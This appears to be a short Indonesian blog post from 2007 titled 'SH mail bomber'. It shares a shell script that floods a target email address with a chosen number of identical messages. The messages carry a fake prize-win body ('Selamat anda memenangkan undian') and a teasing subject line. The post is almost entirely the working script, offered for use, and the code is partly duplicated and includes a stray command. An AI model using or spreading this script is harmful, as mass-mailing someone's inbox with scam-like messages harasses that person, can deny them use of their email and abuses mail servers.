jump to navigation

SH mail bomber November 3, 2007

Posted by bahroell in Scripting shell.
Tags: ,
10 comments

Yang suka bomb mail, ini ada scriptnya.!

#!/bin/sh
if [ $# -lt 2 ]
then
echo “[+] Simple mail bomber”
echo “[+] $0 email@target <jumlah>”
exit 1
fi

#!/bin/sh
if [ $# -lt 2 ]
then
echo “[+] $0 email@target <jumlah>”
exit 1
fi
email=$1
i=1
s=1
echo “Selamat anda memenangkan undian” > /tmp/mail.t
while [ $i -le $2 ]
do
mail -s “Re. Gmana dengan anda???” $email < /tmp/mail.t
i=`expr $i + 1`
done
echo “[+] DONE”
peel 2
clear
cat /tmp/mail.t
rm -rf /tmp/mail.t